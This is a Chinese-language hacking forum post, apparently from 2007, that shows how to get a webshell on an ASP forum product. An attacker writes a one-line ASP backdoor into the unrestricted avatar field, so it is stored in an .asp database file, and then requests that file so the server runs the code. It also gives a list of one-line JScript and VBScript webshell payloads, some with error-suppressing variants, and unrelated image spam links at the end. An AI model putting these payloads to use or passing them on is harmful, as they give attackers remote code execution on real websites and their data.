修改数据库得到webshell(野蔷薇安全阵线)

修改数据库得到webshell

ccc (离线)	楼主-> 我在做什么... 发表于 07-09-25 01:29 修改数据库得到webshell 原文来自：野蔷薇 http://www.yeqiangwei.com/club/f27b0l0fp1t240540p1.html 文章作者：虚幻灵者在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子，我们可以注册成功后在修改个人资料中的头像中向数据库写入asp后门的代码，因为只有这个地方没有长度限制。 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('xuhuan')+'')</SCRIPT><%on error resume next// 以上语句是将一个微型asp后门写入到数据库中，<%on error resume next 用来容错，//用来将后面的干扰代码注释掉！这样当我们提交盗帅的数据库路径http://www.xxx.com/db/daidalos.asp时，由于后缀为asp，IE将会以asp的形式解析代码。我们的asp后门也就成功执行了！用微型asp后门的客户端连接试试.能不能连上了！补充：附： 1：JAVASCRIPT <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT> 容错格式： <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT> 2：VBSCRIPT <%Execute(Request.form("?"))%> 容错格式： Execute("On Error Resume Next:"&Request.form("?")) VBSCRIPT的另一函数： <%ExecuteGlobal(Request.form("!"))%> 容错格式： <%ExecuteGlobal("On Error Resume Next:"&Request.form("!"))%> 美女头像性感美女图片打包下载

原文来自：野蔷薇 http://www.yeqiangwei.com/club/f27b0l0fp1t240540p1.html

文章作者：虚幻灵者

在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子，我们可以注册成功后在修改个人资料中的头像中向数据库写入asp后门的代码，因为只有这个地方没有长度限制。
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('xuhuan')+'')</SCRIPT><%on error resume next//
以上语句是将一个微型asp后门写入到数据库中，<%on error resume next
用来容错，//用来将后面的干扰代码注释掉！这样当我们提交盗帅的数据库路径http://www.xxx.com/db/daidalos.asp时，由于后缀为asp，IE将会以asp的形式解析代码。我们的asp后门也就成功执行了！用微型asp后门的客户端连接试试.能不能连上了！

补充：

附：
1：JAVASCRIPT

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>

容错格式：

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

2：VBSCRIPT

<%Execute(Request.form("?"))%>

容错格式：

Execute("On Error Resume Next:"&Request.form("?"))

VBSCRIPT的另一函数：

<%ExecuteGlobal(Request.form("!"))%>

容错格式：

<%ExecuteGlobal("On Error Resume Next:"&Request.form("!"))%>

美女头像

性感美女图片打包下载